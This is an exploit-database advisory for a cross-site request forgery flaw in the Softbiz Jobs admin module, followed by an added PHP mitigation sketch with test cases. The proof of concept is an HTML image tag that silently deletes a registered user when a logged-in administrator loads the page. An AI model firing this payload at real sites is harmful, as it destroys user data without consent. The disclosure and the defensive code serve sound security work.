Softbiz Jobs CSRF Vulnerability

2010-02-23T00:00:00
ID 1337DAY-ID-11037
Type zdt
Reporter Pratul Agrawal
Modified 2010-02-23T00:00:00

Description

Exploit for unknown platform in category web applications

                                        

                     =======================================================================
  
                                         Softbiz Jobs CSRF Vulnerability
                     =======================================================================
  
                                                     by
  
                                               Pratul Agrawal
  
  
# Vulnerability found in: Admin module
  
# company       aksitservices
  
# Credit by     Pratul Agrawal
 
# Download      http://www.softbizscripts.com/
 
# Script        softbizscripts
 
  
  
# Proof of concept
 
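Script to delete a registered user through Cross-Site Request Forgery. The admin delete action is a plain GET request, so an image tag loaded in a logged-in administrator's browser is enough to trigger it: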
 
...................................................................................................................

<html>
  <body>
    <img src="http://server/scripts/seojobs/admin/delete_employer.php?id=[USER ID]" />
  </body>
</html>

...................................................................................................................
 
 
 
After execution, refresh the page and you can see that the user having id=20 gets deleted automatically.
 
  
#If you have any questions, comments, or concerns, feel free to contact me. 
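
A mitigation sketch for the issue shown above, added here as an example and not taken from Softbiz Jobs or from the original advisory: the delete action is allowed only as a POST from an admin session that also presents a per-session token. The function names, the csrf_token field and the is_admin session key are assumptions.

```php
<?php
// Added example, not Softbiz Jobs code. Function names, the csrf_token field
// and the is_admin session key are assumptions made for illustration.
declare(strict_types=1);

/** Create once per session and return the anti-CSRF token. */
function csrf_token(array &$session): string
{
    return $session['csrf_token'] ??= bin2hex(random_bytes(32));
}

/** Returns [HTTP status, reason]; only 200 means the delete may proceed. */
function authorize_delete(string $method, array $post, array $session): array
{
    // State changes must not ride on GET: <img>, <link> and prefetch all send GET.
    if ($method !== 'POST') {
        return [405, 'delete requires POST'];
    }
    if (empty($session['is_admin'])) {
        return [403, 'no admin session'];
    }
    // The token lives in the session and in the admin form, so another origin
    // cannot read or guess it. hash_equals() compares in constant time.
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    if (!is_string($expected) || !is_string($supplied) || $expected === ''
        || !hash_equals($expected, $supplied)) {
        return [403, 'missing or invalid CSRF token'];
    }
    $id = $post['id'] ?? '';
    if (!is_string($id) || !ctype_digit($id)) {
        return [400, 'id must be numeric'];
    }
    return [200, 'ok'];
}

// Constructed requests against a constructed admin session.
$session = ['is_admin' => true];
$token = csrf_token($session);
$cases = [
    'forged <img> GET'          => ['GET', []],
    'cross-site POST, no token' => ['POST', ['id' => '20']],
    'admin form with token'     => ['POST', ['id' => '20', 'csrf_token' => $token]],
];
foreach ($cases as $name => [$method, $post]) {
    [$status, $reason] = authorize_delete($method, $post, $session);
    printf("%-26s -> %d %s\n", $name, $status, $reason);
}
```

In a real handler the three arguments come from $_SERVER['REQUEST_METHOD'], $_POST and $_SESSION, and the admin form embeds the value of csrf_token() as a hidden field.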



#  0day.today [2018-01-06]  #